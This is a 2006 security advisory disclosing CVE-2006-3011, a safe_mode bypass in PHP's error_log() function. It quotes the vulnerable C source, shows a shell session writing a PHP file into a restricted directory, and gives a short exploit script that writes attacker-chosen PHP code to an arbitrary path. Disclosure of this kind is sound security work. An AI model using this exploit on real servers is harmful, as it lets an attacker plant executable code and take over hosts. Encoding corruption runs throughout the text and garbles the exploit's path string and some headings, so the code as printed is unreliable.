-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 10.6.2006
-Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011
โ 0.Description โ
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with
a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
A nice introduction to PHP by Stig Sะถther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material
is freely available.
error_log โ Send an error message somewhere.
PHP5:
-2013-2050โ
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
php_stream *stream = NULL;
switch (opt_err) {
case 1: /*send an email */
{
#if HAVE_SENDMAIL
if (!php_mail(opt, "PHP error_log message", message, headers, NULL
TSRMLS_CC)) {
return FAILURE;
}
#else
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not
available!");
return FAILURE;
#endif
}
break;
case 2: /*send to an address */
php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
return FAILURE;
break;
case 3: /*save to a file */
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE |
REPORT_ERRORS, NULL);
if (!stream)
return FAILURE;
php_stream_write(stream, message, strlen(message));
php_stream_close(stream);
break;
default:
php_log_err(message TSRMLS_CC);
break;
}
return SUCCESS;
}
Let's see to option 3.
Option "a", writte to file error or if file dosen't exists, create new file.
Problem is because in php_stream_open_wrapper(), is defined "IGNORE_URL".
IGNORE_URL turn off safe_mode if you use "prefix://โฆ/โฆ/".
Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to
access /www/temp owned by uid 80 in Command line code on line 1
Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on
line 1
cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://โฆ/โฆ/www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-rโr-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Exampleโ
โ 2. Exploit โ
<?php
$file=""; # FILENAME
error_log("<? echo \"cx\"; ?>", 3, "php://โฆ/โฆ/".$file);
?>
โ 3. How to fix โ
No response from PHP Team. We have reported this bug in 11.06.2006
โ 4. Greets โ
For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
iD8DBQFEnwdh3Ke13X/fTO4RAv1eAJ9Gux0j+TtpuvsLMhGRu+b0B86DJQCfR4ps
qXoX8VYnwFBa2VmK3zlxpGs=
=VAkg
-----END PGP SIGNATURE-----